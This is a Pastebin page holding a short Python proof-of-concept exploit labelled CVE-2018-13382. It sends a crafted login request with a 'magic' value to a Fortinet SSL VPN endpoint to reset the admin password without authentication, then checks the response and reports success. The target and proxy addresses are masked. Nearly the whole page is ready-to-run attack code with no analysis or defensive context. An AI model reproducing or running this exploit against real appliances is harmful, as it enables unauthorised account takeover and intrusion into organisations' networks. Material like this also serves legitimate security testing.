Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- import requests
- import argparse
- # ignore annoying SSL warnings
- requests.packages.urllib3.disable_warnings()
- proxies = {
- "https": "https://*****:*****"
- }
- def exploit():
- url = "https://*******:*****"
- path = "/remote/logincheck"
- data = {
- "ajax": 0,
- "username": "admin",
- "realm": "",
- "magic": "4tinet2095866",
- "reqid": 0,
- "credential": "Ayli_b1408"
- }
- print("[+] Change new password to: 'Ayli_b1408'")
- req = requests.post(url + path, proxies=proxies, verify=False, data=data)
- if req.status_code == 200:
- if b"auth_type=1" in req.content:
- print("[+] Password was successfully change!")
- else:
- print("[-] Exploit failed")
- if __name__ == "__main__":
- print("[*] CVE-2018-13382 PoC by dhn")
- #parser = argparse.ArgumentParser()
- #parser.add_argument('-H', '--host', required=True)
- #parser.add_argument('-P', '--port', required=True)
- #parser.add_argument('-u', '--username', required=True)
- #parser.add_argument('-p', '--password', required=True)
- #args = parser.parse_args()
- exploit()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
